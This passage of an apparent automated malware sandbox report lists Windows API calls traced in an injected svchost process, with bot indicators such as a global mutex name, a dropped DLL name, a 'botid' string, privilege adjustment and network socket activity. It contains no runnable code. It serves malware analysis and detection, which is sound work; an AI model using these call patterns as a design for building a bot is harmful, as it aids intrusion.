    • recvfrom.WS2_32(00000102,00000000,00000000,00000000,FFFECD63,00000010), ref: 00EFA8D7
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • htons.WS2_32(00000001), ref: 00EFAF0B
      • Part of subcall function 00EFAD6A: GetTickCount.KERNEL32 ref: 00EFAD9F
      • Part of subcall function 00EFAD6A: GetTickCount.KERNEL32 ref: 00EFAE03
      • Part of subcall function 00EFAD6A: htons.WS2_32(00000101), ref: 00EFAE64
      • Part of subcall function 00EFAD6A: htons.WS2_32(FF0400EF), ref: 00EFAE97
      • Part of subcall function 00EFAD6A: GetTickCount.KERNEL32 ref: 00EFAEA8
      • Part of subcall function 00EFACDB: htons.WS2_32(00000005), ref: 00EFACE1
      • Part of subcall function 00EFACDB: htons.WS2_32(00000000), ref: 00EFACF0
    • htons.WS2_32(?), ref: 00EFAF5C
    • Sleep.KERNEL32(0000012C), ref: 00EFAFD5
      • Part of subcall function 00EFAD04: getsockname.WS2_32(00000005,0294FEBC,0294FECC), ref: 00EFAD1C
      • Part of subcall function 00EFA91B: GetAdaptersAddresses.IPHLPAPI(00000002,00000010,00000000,00000000,0294FECC,0294FE20,00000005), ref: 00EFA935
      • Part of subcall function 00EFA91B: GetAdaptersAddresses.IPHLPAPI(00000002,00000010,00000000,00000000,0294FECC), ref: 00EFA952
    • htons.WS2_32(00000003), ref: 00EFB039
    • htons.WS2_32(00000004), ref: 00EFB041
    • htons.WS2_32(00000001), ref: 00EFB050
    • htons.WS2_32(00000008), ref: 00EFB058
    • htons.WS2_32(00000003), ref: 00EFB0BB
    • htons.WS2_32(00000004), ref: 00EFB0C3
    • htons.WS2_32(00000001), ref: 00EFB0D2
    • htons.WS2_32(00000008), ref: 00EFB0DA
    • Sleep.KERNEL32(00000190), ref: 00EFB127
    • htons.WS2_32(00000001), ref: 00EFB137
    • htons.WS2_32(?), ref: 00EFB18B
    • Sleep.KERNEL32(000001F4), ref: 00EFB1D4
    • htons.WS2_32(00000003), ref: 00EFB1E2
    • htons.WS2_32(00000004), ref: 00EFB1EA
    • htons.WS2_32(00000001), ref: 00EFB1F9
    • htons.WS2_32(00000008), ref: 00EFB201
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • GetTickCount.KERNEL32 ref: 00EFBB85
    • FindWindowW.USER32(#32770,00000000), ref: 00EFBB97
    • EnumChildWindows.USER32(00000000,00EFBABE,00000000), ref: 00EFBBB2
    • GetTickCount.KERNEL32 ref: 00EFBBBD
    • Sleep.KERNEL32(000000FA), ref: 00EFBBC6
    • EnumChildWindows.USER32(00000000,00EFBACA,00000000), ref: 00EFBBE9
    • UpdateWindow.USER32(00000000), ref: 00EFBBEC
    • EnumChildWindows.USER32(00000000,00EFBB1E,00000000), ref: 00EFBBFA
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • GetVersionExW.KERNEL32(?), ref: 00EF7201
      • Part of subcall function 00EF713B: lstrlenA.KERNEL32(?,?), ref: 00EF7162
      • Part of subcall function 00EF713B: wsprintfA.USER32(00EF7213,%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00EF71D6
    • GetComputerNameA.KERNEL32(?,00000000), ref: 00EF722E
    • lstrlenA.KERNEL32(?), ref: 00EF7250
    • lstrlenA.KERNEL32(?), ref: 00EF72A5
    • wsprintfA.USER32(-00000214,%s_W%d%d%d.%s,?,?,?,?,?), ref: 00EF72D9
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00EF8549
    • StrStrIW.SHLWAPI(?,Roaming), ref: 00EF8555
    • lstrcpyW.KERNEL32(00000000,Local), ref: 00EF8565
    • lstrcatW.KERNEL32(?,00EFEA08), ref: 00EF8571
    • lstrlenW.KERNEL32(?), ref: 00EF8578
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • GetTickCount.KERNEL32 ref: 00EFAD9F
    • GetTickCount.KERNEL32 ref: 00EFAE03
      • Part of subcall function 00EFA86A: select.WS2_32(00000000,00000001,00000000,00000000,00000000), ref: 00EFA8B2
      • Part of subcall function 00EFA86A: WSAGetLastError.WS2_32 ref: 00EFA8BD
      • Part of subcall function 00EFA86A: recvfrom.WS2_32(00000102,00000000,00000000,00000000,FFFECD63,00000010), ref: 00EFA8D7
    • htons.WS2_32(00000101), ref: 00EFAE64
    • htons.WS2_32(FF0400EF), ref: 00EFAE97
    • GetTickCount.KERNEL32 ref: 00EFAEA8
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
      • Part of subcall function 00EF5907: GetAddrInfoW.WS2_32 ref: 00EF5935
      • Part of subcall function 00EF5907: FreeAddrInfoW.WS2_32(00000000), ref: 00EF594E
    • socket.WS2_32(00000002,00000001,00000000), ref: 00EFAA1D
    • htons.WS2_32(00000050), ref: 00EFAA41
    • connect.WS2_32(00000000,00000010,00000010), ref: 00EFAA52
    • closesocket.WS2_32(00000000), ref: 00EFAA5B
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • GetCurrentProcess.KERNEL32 ref: 00EF52B3
    • OpenProcessToken.ADVAPI32(00000000), ref: 00EF52BA
    • LookupPrivilegeValueW.ADVAPI32(00000000), ref: 00EF52D5
    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 00EF52F2
    • CloseHandle.KERNEL32(?), ref: 00EF52FD
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • WSAStartup.WS2_32(00000202,?), ref: 00EFD1EA
      • Part of subcall function 00EF6926: HeapCreate.KERNEL32(00040000,00400000,00000000), ref: 00EF693B
      • Part of subcall function 00EFD12C: OpenMutexW.KERNEL32(00100000,00000000,Global\zx5fwtw4ep), ref: 00EFD13A
      • Part of subcall function 00EFD12C: CloseHandle.KERNEL32(00000000), ref: 00EFD145
      • Part of subcall function 00EFBCB0: GetVersionExW.KERNEL32(00F036E0), ref: 00EFBCD1
      • Part of subcall function 00EFBC90: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000001,00F03674,00000000), ref: 00EFBCA8
      • Part of subcall function 00EF699A: HeapDestroy.KERNEL32(02510000), ref: 00EF69AC
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
      • Part of subcall function 00EF7BC2: InitializeCriticalSection.KERNEL32(00000420), ref: 00EF7C0F
      • Part of subcall function 00EF8599: DeleteCriticalSection.KERNEL32(02909E88,00EFD1C8,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF859D
      • Part of subcall function 00EF327D: CloseHandle.KERNEL32(0000039C), ref: 00EF329F
      • Part of subcall function 00EF327D: DeleteCriticalSection.KERNEL32(0290839C,?,?,00EFBAB7), ref: 00EF32B2
      • Part of subcall function 00EF327D: DeleteCriticalSection.KERNEL32(029083B4,?,?,00EFBAB7), ref: 00EF32BB
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992
      • Part of subcall function 00EF7F4A: DeleteCriticalSection.KERNEL32(0290B100,0290ACE0), ref: 00EF7F81
      • Part of subcall function 00EF3244: InitializeCriticalSection.KERNEL32(00000394), ref: 00EF3265
      • Part of subcall function 00EF3244: InitializeCriticalSection.KERNEL32(000003AC), ref: 00EF326E
      • Part of subcall function 00EFDA92: InitializeCriticalSection.KERNEL32(00F03834), ref: 00EFDAA1
      • Part of subcall function 00EFDA92: DeleteCriticalSection.KERNEL32(00F03834,?,00EFD460,00F03688,?,?), ref: 00EFDAB9
      • Part of subcall function 00EFDA92: GetModuleHandleW.KERNEL32(ntdll.dll), ref: 00EFDBD8
      • Part of subcall function 00EFDA92: GetProcAddress.KERNEL32(00000000), ref: 00EFDBE1
      • Part of subcall function 00EFDA92: GetModuleHandleW.KERNEL32(ntdll.dll), ref: 00EFDBF2
      • Part of subcall function 00EFDA92: GetProcAddress.KERNEL32(00000000), ref: 00EFDBF5
      • Part of subcall function 00EFDA92: GetModuleHandleW.KERNEL32(ntdll.dll), ref: 00EFDC06
      • Part of subcall function 00EFDA92: GetProcAddress.KERNEL32(00000000), ref: 00EFDC09
      • Part of subcall function 00EFDA92: GetCurrentProcessId.KERNEL32 ref: 00EFDC10
      • Part of subcall function 00EF52A4: GetCurrentProcess.KERNEL32 ref: 00EF52B3
      • Part of subcall function 00EF52A4: OpenProcessToken.ADVAPI32(00000000), ref: 00EF52BA
      • Part of subcall function 00EF52A4: LookupPrivilegeValueW.ADVAPI32(00000000), ref: 00EF52D5
      • Part of subcall function 00EF52A4: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 00EF52F2
      • Part of subcall function 00EF52A4: CloseHandle.KERNEL32(?), ref: 00EF52FD
    • CreateThread.KERNEL32(00000000,00000000,00EFCF96,00F032D0), ref: 00EFD498
      • Part of subcall function 00EFD150: CreateMutexW.KERNEL32(00F03678,00000001,Global\zx5fwtw4ep), ref: 00EFD15C
    • TerminateThread.KERNEL32(00000000), ref: 00EFD4BE
      • Part of subcall function 00EFDC95: DeleteCriticalSection.KERNEL32(00F03834,00EFD50A,?,?,00EFBAB7), ref: 00EFDC9A
    Strings
    • D:P(A;;GA;;;SY)(A;;GA;;;BA)(A;;GA;;;WD)(A;;GA;;;RC)S:(ML;;NW;;;LW), xrefs: 00EFD257
    • D:P(A;;GA;;;SY)(A;;GA;;;BA)(A;;GA;;;WD)(A;;GA;;;RC)(A;;GA;;;AC)S:(ML;;NW;;;S-1-16-0), xrefs: 00EFD250
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992
    • CreateFileW.KERNEL32(00EF85E7,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00EF872D
    • GetFileSize.KERNEL32(00000000,00000000), ref: 00EF8741
    • CloseHandle.KERNEL32(?), ref: 00EF87C2
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00EF876E
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • FindResourceW.KERNEL32(?,?,0000000A), ref: 00EF5546
    • LoadResource.KERNEL32(?,00000000), ref: 00EF5557
    • SizeofResource.KERNEL32(?,00000000), ref: 00EF5567
    • LockResource.KERNEL32(00000000), ref: 00EF5573
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992
    • lstrlenW.KERNEL32(00000000), ref: 00EFABB2
    • StrToIntW.SHLWAPI(0294FEE6), ref: 00EFABE3
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
      • Part of subcall function 00EF589B: lstrlenW.KERNEL32(000000FF), ref: 00EF58A9
      • Part of subcall function 00EF589B: WideCharToMultiByte.KERNEL32(00000000,00000000,000000FF,00000000,00000D96,00000001,00000000,00000000), ref: 00EF58E0
      • Part of subcall function 00EF589B: inet_addr.WS2_32(00000D96), ref: 00EF58ED
    • htons.WS2_32(00000D96), ref: 00EFAC57
      • Part of subcall function 00EF5907: GetAddrInfoW.WS2_32 ref: 00EF5935
      • Part of subcall function 00EF5907: FreeAddrInfoW.WS2_32(00000000), ref: 00EF594E
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
      • Part of subcall function 00EF87D1: lstrlenA.KERNEL32(?,00000000,00000000,-00000006,?,?,?,?,?,00EF88DE,?,-00000006,00000000,00000000,-00000006,00EF89B3), ref: 00EF87FB
      • Part of subcall function 00EF87D1: lstrlenA.KERNEL32(?,00000000,00000000,-00000006,?,?,?,?,?,00EF88DE,?,-00000006,00000000,00000000,-00000006,00EF89B3), ref: 00EF8843
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992
    • CreateFileW.KERNEL32(00EF89B3,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00EF8920
    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00EF893A
    • CloseHandle.KERNEL32(00000000), ref: 00EF8951
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • htons.WS2_32(?), ref: 00EFAB12
      • Part of subcall function 00EFA78C: socket.WS2_32(00000002,00000002,00000000), ref: 00EFA79B
      • Part of subcall function 00EFA78C: bind.WS2_32(00000000,0294FED0,00000010), ref: 00EFA7D0
      • Part of subcall function 00EFA78C: WSAGetLastError.WS2_32 ref: 00EFA7DB
      • Part of subcall function 00EFA78C: closesocket.WS2_32(00000000), ref: 00EFA7E4
      • Part of subcall function 00EFA78C: WSASetLastError.WS2_32(00000000), ref: 00EFA7EB
    • htons.WS2_32(?), ref: 00EFAB33
    • htons.WS2_32(00000400), ref: 00EFAB55
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
      • Part of subcall function 00EF8540: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00EF8549
      • Part of subcall function 00EF8540: StrStrIW.SHLWAPI(?,Roaming), ref: 00EF8555
      • Part of subcall function 00EF8540: lstrcpyW.KERNEL32(00000000,Local), ref: 00EF8565
      • Part of subcall function 00EF8540: lstrcatW.KERNEL32(?,00EFEA08), ref: 00EF8571
      • Part of subcall function 00EF8540: lstrlenW.KERNEL32(?), ref: 00EF8578
    • lstrcatW.KERNEL32(?,nwuvbe82n0.dll), ref: 00EF85C5
      • Part of subcall function 00EF8BC8: EnterCriticalSection.KERNEL32(-00000008,00EF85D4), ref: 00EF8BCC
      • Part of subcall function 00EF8714: CreateFileW.KERNEL32(00EF85E7,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00EF872D
      • Part of subcall function 00EF8714: GetFileSize.KERNEL32(00000000,00000000), ref: 00EF8741
      • Part of subcall function 00EF8714: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00EF876E
      • Part of subcall function 00EF8714: CloseHandle.KERNEL32(?), ref: 00EF87C2
      • Part of subcall function 00EF8BD6: LeaveCriticalSection.KERNEL32(00EF87A5,00EF8AF9,00000000,00000000,-00000006,00000006,?,00EF86F4,00000000,-00000006,00000000,?,?,?,00000000,00000000), ref: 00EF8BDA
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
      • Part of subcall function 00EF8540: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00EF8549
      • Part of subcall function 00EF8540: StrStrIW.SHLWAPI(?,Roaming), ref: 00EF8555
      • Part of subcall function 00EF8540: lstrcpyW.KERNEL32(00000000,Local), ref: 00EF8565
      • Part of subcall function 00EF8540: lstrcatW.KERNEL32(?,00EFEA08), ref: 00EF8571
      • Part of subcall function 00EF8540: lstrlenW.KERNEL32(?), ref: 00EF8578
    • lstrcatW.KERNEL32(?,nwuvbe82n0.dll), ref: 00EF8990
      • Part of subcall function 00EF8BC8: EnterCriticalSection.KERNEL32(-00000008,00EF85D4), ref: 00EF8BCC
      • Part of subcall function 00EF88BA: CreateFileW.KERNEL32(00EF89B3,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00EF8920
      • Part of subcall function 00EF88BA: WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00EF893A
      • Part of subcall function 00EF88BA: CloseHandle.KERNEL32(00000000), ref: 00EF8951
      • Part of subcall function 00EF8BD6: LeaveCriticalSection.KERNEL32(00EF87A5,00EF8AF9,00000000,00000000,-00000006,00000006,?,00EF86F4,00000000,-00000006,00000000,?,?,?,00000000,00000000), ref: 00EF8BDA
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
    • CreateMutexW.KERNEL32(00F03678,00000001,Global\zx5fwtw4ep), ref: 00EFD15C
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.615507079.00EF0000.00000040.sdmp, Offset: 00EF0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_ef0000_svchost.jbxd
    APIs
      • Part of subcall function 00EFAB00: htons.WS2_32(?), ref: 00EFAB12
      • Part of subcall function 00EFAB00: htons.WS2_32(?), ref: 00EFAB33
      • Part of subcall function 00EFAB00: htons.WS2_32(00000400), ref: 00EFAB55
    • WSAGetLastError.WS2_32(0294FEE4,00000000), ref: 00EFB2B2
    • closesocket.WS2_32(00000000), ref: 00EFB334
      • Part of subcall function 00EFABA4: lstrlenW.KERNEL32(00000000), ref: 00EFABB2
      • Part of subcall function 00EFABA4: StrToIntW.SHLWAPI(0294FEE6), ref: 00EFABE3
      • Part of subcall function 00EFABA4: htons.WS2_32(00000D96), ref: 00EFAC57
      • Part of subcall function 00EFAEE0: htons.WS2_32(00000001), ref: 00EFAF0B
      • Part of subcall function 00EFAEE0: htons.WS2_32(?), ref: 00EFAF5C
      • Part of subcall function 00EFAEE0: Sleep.KERNEL32(0000012C), ref: 00EFAFD5
      • Part of subcall function 00EFAEE0: htons.WS2_32(00000003), ref: 00EFB039
      • Part of subcall function 00EFAEE0: htons.WS2_32(00000004), ref: 00EFB041
      • Part of subcall function 00EFAEE0: htons.WS2_32(00000001), ref: 00EFB050
      • Part of subcall function 00EFAEE0: htons.WS2_32(00000008), ref: 00EFB058
      • Part of subcall function 00EFAEE0: htons.WS2_32(00000003), ref: 00EFB0BB
      • Part of subcall function 00EFAEE0: htons.WS2_32(00000004), ref: 00EFB0C3
      • Part of subcall function 00EFAEE0: htons.WS2_32(00000001), ref: 00EFB0D2
      • Part of subcall function 00EFAEE0: htons.WS2_32(00000008), ref: 00EFB0DA
      • Part of subcall function 00EFAEE0: Sleep.KERNEL32(00000190), ref: 00EFB127
      • Part of subcall function 00EFAEE0: htons.WS2_32(00000001), ref: 00EFB137
      • Part of subcall function 00EFAEE0: htons.WS2_32(?), ref: 00EFB18B
      • Part of subcall function 00EFAEE0: Sleep.KERNEL32(000001F4), ref: 00EFB1D4
      • Part of subcall function 00EFAEE0: htons.WS2_32(00000003), ref: 00EFB1E2
      • Part of subcall function 00EFAEE0: htons.WS2_32(00000004), ref: 00EFB1EA
      • Part of subcall function 00EFAEE0: htons.WS2_32(00000001), ref: 00EFB1F9
      • Part of subcall function 00EFAEE0: htons.WS2_32(00000008), ref: 00EFB201
    APIs
    • CreateMutexW.KERNEL32(00000000,00000000,00000000), ref: 00EF32F3
    • CloseHandle.KERNEL32(?), ref: 00EF331C
    APIs
      • Part of subcall function 00EF71E5: GetVersionExW.KERNEL32(?), ref: 00EF7201
      • Part of subcall function 00EF71E5: GetComputerNameA.KERNEL32(?,00000000), ref: 00EF722E
      • Part of subcall function 00EF71E5: lstrlenA.KERNEL32(?), ref: 00EF7250
      • Part of subcall function 00EF71E5: lstrlenA.KERNEL32(?), ref: 00EF72A5
      • Part of subcall function 00EF71E5: wsprintfA.USER32(-00000214,%s_W%d%d%d.%s,?,?,?,?,?), ref: 00EF72D9
    • lstrlenA.KERNEL32(00000314,00000000,botid,00000314,00000080,00000000,00000000,?,00EF7EC5,00000438,00000000,?,00EF7C1C), ref: 00EF7357
    APIs
    • wsprintfA.USER32(00F02FBC,%d.%d.%d.%d,00000000,00000000,00000000,00000000,00F032D0,?,?,00EFD0DC,00000029,00EFC788,00F032D0,0000002B,00EFC664,00F032D0), ref: 00EFBE43
    APIs
    APIs
    • CreateThread.KERNEL32(00000000,00000000,00EFBB78,00000000), ref: 00EFBC1C
    • CloseHandle.KERNEL32(00000000), ref: 00EFBC23
    APIs
    Memory Dump Source
    • Source File: 00000006.00000002.615036791.00A60000.00000040.sdmp, Offset: 00A60000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_a60000_svchost.jbxd
    APIs
    • CreateThread.KERNEL32(00000000,00000000,00EF6B9A,?), ref: 00EF6CE7
    APIs
    • sendto.WS2_32(00000064,00000000,71AB6872,00000000,00000010,00000010), ref: 00EFA80F
    APIs
    • HeapCreate.KERNEL32(00040000,00400000,00000000), ref: 00EF693B
    APIs
    • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000001,00F03674,00000000), ref: 00EFBCA8
    APIs
    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,?,00A603E0,?,00000000), ref: 00A60634
    Memory Dump Source
    • Source File: 00000006.00000002.615036791.00A60000.00000040.sdmp, Offset: 00A60000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_a60000_svchost.jbxd

    Non-executed Functions

    APIs
    • WSAStartup.WS2_32(00000202,?), ref: 00EF11E7
    • GetLastError.KERNEL32 ref: 00EF11F1
    • WSACreateEvent.WS2_32 ref: 00EF1200
    • CloseHandle.KERNEL32(?), ref: 00EF1583
      • Part of subcall function 00EF6955: HeapAlloc.KERNEL32(00000008,?,?,00EF4089,00000000,00000000,?,00EF4FDD,00000000,00000000,?,00EF391E,02908008,02908008,00EF328A,00EFD51B), ref: 00EF6963
    • shutdown.WS2_32(00000001,00000002), ref: 00EF1245
    • closesocket.WS2_32(00000001), ref: 00EF124C
    • Sleep.KERNEL32(000249F0), ref: 00EF1257
    • WSASocketW.WS2_32(00000002,00000001,00000006,00000000,00000000,00000000), ref: 00EF1266
    • inet_addr.WS2_32(?), ref: 00EF1282
    • htons.WS2_32(?), ref: 00EF1291
    • Sleep.KERNEL32(000249F0), ref: 00EF12B3
    • WSAConnect.WS2_32(?,?,00000010,00000000,00000000,00000000,00000000), ref: 00EF12CC
    • WSASend.WS2_32 ref: 00EF1369
    • WSAEventSelect.WS2_32(?,?,00000021), ref: 00EF13A0
    • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,000000FF,00000000), ref: 00EF13BD
    • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00EF13DB
    • WSARecv.WS2_32(?,?,00000001,?,?,00000000,00000000), ref: 00EF1413
    • WSAGetLastError.WS2_32 ref: 00EF143E
      • Part of subcall function 00EF3334: HeapFree.KERNEL32(00000000,?,?,00EFD1CE,02909E90,0290ACE0,00EFD53F,?,?,00EFBAB7), ref: 00EF6992
      • Part of subcall function 00EF9B51: CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000), ref: 00EF9B8C
      • Part of subcall function 00EF9B51: GetLastError.KERNEL32(?,?,?,00EF7AD8,00000000), ref: 00EF9B92
      • Part of subcall function 00EF9B51: GetLastError.KERNEL32(?,?,?,00EF7AD8,00000000), ref: 00EF9B98
      • Part of subcall function 00EF9B51: CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000008), ref: 00EF9BB2
      • Part of subcall function 00EF9B51: CryptImportKey.ADVAPI32(00000000,00000000,00EF7AD8,00000000,00000000,00EF7AD8), ref: 00EF9BCD
      • Part of subcall function 00EF9B51: CryptCreateHash.ADVAPI32(00000000,00008004,00000000,00000000,00000000), ref: 00EF9BE8
      • Part of subcall function 00EF9B51: CryptHashData.ADVAPI32(00000000,?,00000000,00000000), ref: 00EF9BFA
      • Part of subcall function 00EF9B51: CryptVerifySignatureW.ADVAPI32(00000000,?,?,00EF7AD8,00000000,00000000,?,?,?,00EF7AD8,00000000), ref: 00EF9C12
      • Part of subcall function 00EF9B51: CryptDestroyHash.ADVAPI32(00000000), ref: 00EF9C1D
      • Part of subcall function 00EF9B51: CryptDestroyKey.ADVAPI32(00EF7AD8), ref: 00EF9C26
      • Part of subcall function 00EF9B51: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00EF9C30
    • GetTickCount.KERNEL32 ref: 00EF14F6
    • GetTickCount.KERNEL32 ref: 00EF14FB
      • Part of subcall function 00EF1D43: WSASocketW.WS2_32(00000002,00000001,00000006,00000000,00000000,00000000), ref: 00EF1D63
      • Part of subcall function 00EF1D43: inet_addr.WS2_32(?), ref: 00EF1D7D
      • Part of subcall function 00EF1D43: htons.WS2_32(?), ref: 00EF1D8B
      • Part of subcall function 00EF1D43: WSAConnect.WS2_32(?,?,00000010,00000000,00000000,00000000,00000000), ref: 00EF1DA2
      • Part of subcall function 00EF1D43: CreateThread.KERNEL32(00000000,00000000,00EF273A,00000000), ref: 00EF1DD2
      • Part of subcall function 00EF1D43: SetThreadPriority.KERNEL32(00000000,00000002), ref: 00EF1DE2
      • Part of subcall function 00EF1D43: WSASend.WS2_32(00000000,?,00000001,?,00000000,00000000,00000000), ref: 00EF1E1B
      • Part of subcall function 00EF1D43: WSAGetLastError.WS2_32 ref: 00EF1E26
      • Part of subcall function 00EF1D43: TerminateThread.KERNEL32(?,00000000), ref: 00EF1E37
      • Part of subcall function 00EF1D43: shutdown.WS2_32(?,00000002), ref: 00EF1E45
      • Part of subcall function 00EF1D43: closesocket.WS2_32(?), ref: 00EF1E4E
      • Part of subcall function 00EF1000: WSASend.WS2_32(0000054F,?,00000001,?,00000000,00000000,00000000), ref: 00EF1064
      • Part of subcall function 00EF1000: GetTickCount.KERNEL32 ref: 00EF107F
      • Part of subcall function 00EF1000: WSAWaitForMultipleEvents.WS2_32(00000002,?,00000000,00003A98,00000000,?,?,7C80934A), ref: 00EF109E
      • Part of subcall function 00EF1000: WSAEnumNetworkEvents.WS2_32(0000054F,00000001,?), ref: 00EF10D0
      • Part of subcall function 00EF1000: WSARecv.WS2_32(0000054F,?,00000001,?,?,00000000,00000000), ref: 00EF110C
      • Part of subcall function 00EF1000: WaitForSingleObject.KERNEL32(?,00000010), ref: 00EF1162
      • Part of subcall function 00EF1000: WSAGetLastError.WS2_32(?,?,7C80934A), ref: 00EF1198
      • Part of subcall function 00EF1000: WSAGetLastError.WS2_32(?,?,7C80934A), ref: 00EF11AE
    • shutdown.WS2_32(?,00000002), ref: 00EF154A
    • closesocket.WS2_32(?), ref: 00EF1554
    • WSACloseEvent.WS2_32(?), ref: 00EF155E
    APIs
    • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000), ref: 00EF9B8C
